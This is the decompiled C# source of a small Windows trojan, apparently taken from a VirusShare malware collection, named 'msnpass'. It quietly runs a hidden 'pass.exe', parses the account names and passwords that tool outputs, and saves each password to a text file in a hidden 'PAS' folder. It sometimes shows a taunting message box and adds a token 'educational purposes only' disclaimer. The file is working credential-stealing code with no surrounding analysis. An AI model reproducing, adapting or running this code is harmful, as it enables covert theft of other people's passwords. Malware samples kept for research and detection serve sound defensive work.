// Decompiled with JetBrains decompiler // Type: msnpass.Program // Assembly: msnpass, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 2ED384D7-4351-48FD-8838-EBAD7AD18D21 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Hesv.cpfa-7c073469bc2761d846d97e8b26448df45289ff688e24ad10374ae7ffde69f130.exe using System; using System.Diagnostics; using System.IO; using System.Windows.Forms; namespace msnpass { internal static class Program { [STAThread] private static void Main() { if (new Random().Next(10) == 5) { int num = (int) MessageBox.Show("The bastard next to you is hacking your msn password using his USB!!", "Error: VIRUS www.dngloz.com"); } Process process = new Process(); process.StartInfo.UseShellExecute = false; process.StartInfo.RedirectStandardOutput = true; process.StartInfo.FileName = "pass.exe"; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.StartInfo.CreateNoWindow = true; process.Start(); string[] strArray1 = process.StandardOutput.ReadToEnd().Split('\n'); process.WaitForExit(); string[] strArray2 = new string[strArray1.Length]; string[] strArray3 = new string[strArray1.Length]; Directory.CreateDirectory("PAS"); new DirectoryInfo("PAS").Attributes = FileAttributes.Hidden; for (int index = 0; index < strArray1.Length - 2; ++index) { string[] strArray4 = strArray1[index].Split(' '); strArray2[index] = strArray4[1]; strArray3[index] = strArray4[3]; using (StreamWriter streamWriter = new StreamWriter("PAS/" + strArray2[index] + ".txt")) { streamWriter.WriteLine("Don't be an idiot and ruin someones life..."); streamWriter.WriteLine("This is for educational purposes only!"); streamWriter.WriteLine("You are fully responsible on how you use it."); streamWriter.WriteLine(); streamWriter.WriteLine("----- http://www.dngloz.com -----"); streamWriter.WriteLine(); streamWriter.WriteLine("Password: " + strArray3[index]); } } } } }